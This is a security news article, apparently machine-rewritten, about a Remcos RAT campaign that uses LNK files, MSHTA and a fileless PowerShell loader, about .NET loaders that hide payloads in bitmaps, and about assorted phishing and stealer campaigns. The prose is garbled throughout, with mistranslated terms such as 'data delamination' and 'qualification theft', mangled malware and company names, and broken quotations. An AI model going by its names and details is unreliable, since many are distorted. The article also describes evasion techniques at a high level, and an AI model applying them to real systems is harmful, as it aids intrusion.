Cybersecurity researchers are shedding light on a new malware campaign that uses a PowerShell-based shellcode loader to deploy a remote access trojan called Remcos Rat.
“Threat officials deliver malicious LNK files embedded in ZIP archives, often disguising office documents,” Qualys security researcher Akshay Thorve said in a technical report. “The attack chain utilizes MSHTA.EXE for proxy execution early on.”
As Qualys details, the latest attacks tempt users to use tax-related lures to open malicious ZIP archives containing Windows Shortcuts (LNK) files.
The binary is used to run an obfuscated HTA file named “xlab22.hta” hosted on a remote server that incorporates Visual Basic Script code to download a visualshell script, a decoy PDF, and another HTA file similar to xlab22.hta called “311.hta”. The HTA file is configured to create changes to the Windows registry and to automatically start “311.hta” when the system starts up.
Once the PowerShell script is run, it decodes and rebuilds the shellcode loader that will eventually proceed to fully boot the REMCOS rat payload in memory.
Remcos Rat is a well-known malware that gives threat actors complete control over the compromised system, making it an ideal tool for cyber espionage and data theft. The 32-bit binaries compiled using Visual Studio C++8 have a modular structure that allows you to get a system metadata, log keystrokes, capture screenshots, clipboard data monitoring, and a list of all installed programs and execution processes.
Additionally, “Establish a TLS connection to a command and control (C2) server with ReadySteaurants[.]com, “Maintaining persistent channels for data delamination and control.
This is not the first time a greasy version of Remcos Rat has been discovered in the wild. In November 2024, Fortinet Fortiguard Labs detailed a phishing campaign that skillfully deployed malware by using order-themed lures.
What makes the attack method appealing to threat actors is that malicious code runs directly into computer memory and leaves almost a trace on disk, allowing it to work undetected by many traditional security solutions.
“The rise of Powershell-based attacks like the new Remcos rat variant shows that threat actors are evolving to avoid traditional security measures,” says J Stephen Kowski, field CTO at Slashnext.
“This fileless malware runs directly in memory by running obfuscated PowerShell scripts that can bypass traditional defenses using LNK files and MSHTA.exe. Advanced email security is important to detect and block malicious LNK attachments before reaching the user.
This disclosure details the new .NET loaders used by the Palo Alto Network Unit 42 and Thrare Tray to explode the wide range of product information steelers and rats, including Agents Tesla, Novastoler, Lenkosratt, Vicky Roger, Xologer, XWORM.
The loader features three stages that function in tandem to deploy the final stage payload. .NET executable embedding the second and third stages in an encrypted form.
“The previous versions incorporate the second stage as a hard-coded string, while more recent versions use bitmap resources,” Sleitrey said. “The first stage extracts this data, decrypts it, then runs it in memory to launch the second stage.”
Unit 42 described the use of bitmap resources to bypass traditional security mechanisms and hide malicious payloads that can bypass detection.
The findings are also consistent with the emergence of several phishing and social engineering campaigns designed for qualification theft and delivery of malware –
Use the Trojanized version of Keepass Password Management Software (CodeNead Keeloader) to drop cobalt strike beacons and steal sensitive Keepass database data, including management qualifications. The malicious installer is hosted in the Keepass Typosquat domain provided via Bing Ads. Using Clickfix lures and URLs embedded in PDF documents, as well as a set of intermediate dropper URLs for deploying Lumma Stealer. Using Booby-confined Microsoft Office documents used to deploy Formbook Information Stealer protected using a malware distribution service called Horus Protector. Load the qualification phishing page locally via phishing email using Blob Uris. BlobUris is provided using an Alow-Listed page (e.g. onedrive.live[.]com) It has been abused to redirect victims to malicious sites that contain links to actor-controlled HTML pages of threats. The use of RAR archives pose as setup files to distribute Netportrats in attacks targeting Ukraine and Poland. Use phishing emails to distribute HTML attachments containing malicious code to capture victim outlook, hotmail, and Gmail credentials and eliminate them in a telegram bot named “Blessed Logs” that has been active since February 2025.
This development is complemented by an increase in campaigns powered by AI (AI) that utilize real-time mutation polymorphic tricks. These include changing the email subject, sender name, and body content to slip past signature-based detections.
“AI has given threat actors the power to automate malware development, expand attacks across the industry, and personalize phishing messages with surgical accuracy,” says Cofense.
“These evolving threats can bypass traditional email filters, highlighting the impediment of perimeter-only defenses and the need for post-delivery detection, and have been able to beat traditional defenses through polymorphic phishing campaigns that shift content on the fly.
Source link
